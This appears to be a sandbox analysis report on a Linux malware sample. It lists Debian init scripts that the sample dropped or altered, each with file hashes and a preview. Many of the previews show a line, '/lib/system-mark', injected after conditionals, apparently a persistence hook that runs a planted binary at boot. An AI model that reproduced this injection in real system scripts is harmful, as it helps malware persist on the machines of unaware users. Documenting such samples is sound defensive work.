Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1522498878727045
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
MD5:	40E4F04E723FB5BEE6DF2327EA35254D
SHA1:	D512EAB734F222022E210CCA19128E992691CF78
SHA-256:	EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
SHA-512:	71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.995870971917478
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
MD5:	E666B216857A200A89A8C38279974070
SHA1:	5184B1942742E7D4811A8BA0080BD19413306EB5
SHA-256:	3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
SHA-512:	A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.972539518025109
Encrypted:	false
SSDEEP:	24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
MD5:	ECC4B12F805560CED916AF27BF8423D1
SHA1:	A5954BF38D2E34AE23286D676FE6E4153CDBFF69
SHA-256:	C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
SHA-512:	CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.309956240738216
Encrypted:	false
SSDEEP:	48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
MD5:	89A7217DCF2B72ACC044B81A9CC3FC6F
SHA1:	E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
SHA-256:	896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
SHA-512:	8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.907145181173842
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
MD5:	0B192EEF5B7E6AE9C89B8E127943E04C
SHA1:	6F6B5F63D1F504524C5C27849353255A6EDEA52E
SHA-256:	D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
SHA-512:	860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.282612583353571
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
MD5:	E6E338C277324717A5722E4EA56AA2EE
SHA1:	46334BCB354D10D0AAC47F4D542710B66D446A77
SHA-256:	5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
SHA-512:	19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.1022129052660485
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
MD5:	46FB137F6F75999F794FDB149BCAD53B
SHA1:	90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
SHA-256:	D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
SHA-512:	C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.314197695143652
Encrypted:	false
SSDEEP:	12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
MD5:	273FB590FE7F5DAE000DC871BC5418DB
SHA1:	90575E32A398270FC2D10448A454646B84F3B257
SHA-256:	D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
SHA-512:	62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.325203715837751
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
MD5:	0DBC33D8B96CA2A841D1A83960BDF389
SHA1:	BDC86C7897C467A42075B2C80A1CAEDCCA794F76
SHA-256:	631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
SHA-512:	F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.31314714541473
Encrypted:	false
SSDEEP:	48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
MD5:	54E61FBA1E794A3A95B4FA31099CEB2F
SHA1:	4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
SHA-256:	BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
SHA-512:	6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.112756814918559
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
MD5:	207481F279E4D4E87E2455C16287C685
SHA1:	1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
SHA-256:	225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
SHA-512:	E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.863837327437562
Encrypted:	false
SSDEEP:	48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
MD5:	CE0C8A7E1042C39FB28FEE6981E2ACE4
SHA1:	C7B193DB855B637F7011A28928DE2E0A5796B825
SHA-256:	32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
SHA-512:	1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.3052027136710675
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
MD5:	2B23E2A5868129F5B68D4465E1FBA27A
SHA1:	8781CE140244ABA8178CCC20B50AB3C252D82A1F
SHA-256:	5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
SHA-512:	8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.274418902272115
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
MD5:	92B74D7357C759DB635940F9DBE7A5E8
SHA1:	88C813B379F01849C7A709BF47D8C40AB2A25345
SHA-256:	DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
SHA-512:	405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.25253518776668
Encrypted:	false
SSDEEP:	12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	BEA2BDFD5F7688D4F6E313DC63CA499D
SHA1:	4D6764F461EE096E83A5F5923ED8472A94526E95
SHA-256:	8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
SHA-512:	932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.249855326047257
Encrypted:	false
SSDEEP:	96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
MD5:	BBBAC3DC084FCC76813396852B0383FE
SHA1:	675F156F5AAF3BFA73C23A1478680F9769D19926
SHA-256:	BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
SHA-512:	C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . 